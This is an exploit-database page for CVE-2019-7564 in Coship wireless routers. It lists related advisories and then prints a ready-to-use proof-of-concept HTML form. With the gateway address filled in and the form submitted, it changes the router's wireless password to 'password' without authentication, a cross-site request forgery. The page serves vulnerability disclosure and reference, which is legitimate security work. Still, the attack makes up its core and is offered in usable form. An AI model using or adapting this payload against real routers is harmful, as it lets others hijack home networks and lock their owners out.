| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
| Coship Wireless Router 4.0.0.x/5.0.0.x - WiFi Password Reset | 11 Feb 201900:00 | – | zdt | |
| CVE-2019-7564 | 7 May 201918:52 | – | cve | |
| CVE-2019-7564 | 7 May 201918:52 | – | cvelist | |
| EUVD-2019-17102 | 7 Oct 202500:30 | – | euvd | |
| Coship Wireless Router 4.0.0.x5.0.0.x - WiFi Password Reset | 11 Feb 201900:00 | – | exploitpack | |
| CVE-2019-7564 | 7 May 201919:29 | – | nvd | |
| Coship Wireless Router 4.0.0.x / 5.0.0.x Authentication Bypass | 11 Feb 201900:00 | – | packetstorm | |
| Authentication flaw | 7 May 201919:29 | – | prion | |
| CVE-2019-7564 | 7 Jan 202609:34 | – | redhatcve |
# Exploit Title: Coship Wireless Router – Wireless SSID Unauthenticated Password Reset
# Date: 07.02.2019
# Exploit Author: Adithyan AK
# Vendor Homepage: http://en.coship.com/
# Category: Hardware (WiFi Router)
# Affected Versions *: *Coship RT3052 - 4.0.0.48, Coship RT3050 - 4.0.0.40, Coship WM3300 - 5.0.0.54, Coship WM3300 - 5.0.0.55, Coship RT7620 - 10.0.0.49.
# Tested on: MacOS Mojave v.10.14
# CVE: CVE-2019-7564
#POC :
# Change the X.X.X.X in poc to Router Gateway address and save the below code as Exploit.html
# Open Exploit.html with your Browser
# Click on “Submit request”
# The password of the Wireless SSID will be changed to "password"
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://X.X.X.X/regx/wireless/wl_security_2G.asp
<http://router-ip/regx/wireless/wl_security_2G.asp>" method="POST">
<input type="hidden" name="wl_wep" value="disabled" />
<input type="hidden" name="wl_auth_mode" value="none" />
<input type="hidden" name="page" value="wl_security_2G.asp" />
<input type="hidden" name="wl_unit" value="0" />
<input type="hidden" name="action" value="Apply" />
<input type="hidden" name="wl_auth" value="0" />
<input type="hidden" name="wl_akm" value="psk psk2" />
<input type="hidden" name="wl_crypto" value="tkip+aes" />
<input type="hidden" name="wl_wpa_gtk_rekey" value="0" />
<input type="hidden" name="wl_wpa_psk" value="password" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation